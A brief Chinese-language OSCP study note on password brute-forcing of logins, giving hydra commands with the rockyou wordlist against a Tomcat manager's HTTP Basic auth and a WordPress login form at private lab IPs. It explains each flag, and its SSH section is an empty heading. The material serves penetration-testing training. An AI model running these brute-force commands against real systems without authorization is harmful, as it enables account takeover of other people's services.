登录认证爆破

描述

OSCP常见的登录认证爆破

http 登录认证爆破

http basic 认证爆破

hydra -l tomcat -P rockyou.txt 192.168.0.109 -s 8080 http-get /manager/html -t 64

或者 hydra -l tomcat -P rockyou.txt http-get://192.168.0.109:8080/manager/html -t 32

-l 参数指定用户名
-P 指定口令文件，文件中每行一个口令
-s 指定端口
-t 指定线程数量

http 表单认证爆破

http[s]-{head|get|post} http[s]-{get|post}-form

基本用法： hydra -l username -P password-list {service}://{host}:{port}/{url}:{form}:{keywords}

form 是表单的构成
keywords 是登录失败时出现的关键字

hydra -l admin -P rockyou.txt "http-post-form://192.168.154.190:80/wordpress/wp-login.php:log=admin&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.154.190%2Fwordpress%2Fwp-admin%2F&testcookie=1:incorrect"

ssh 登录认证爆破

最后更新于1年前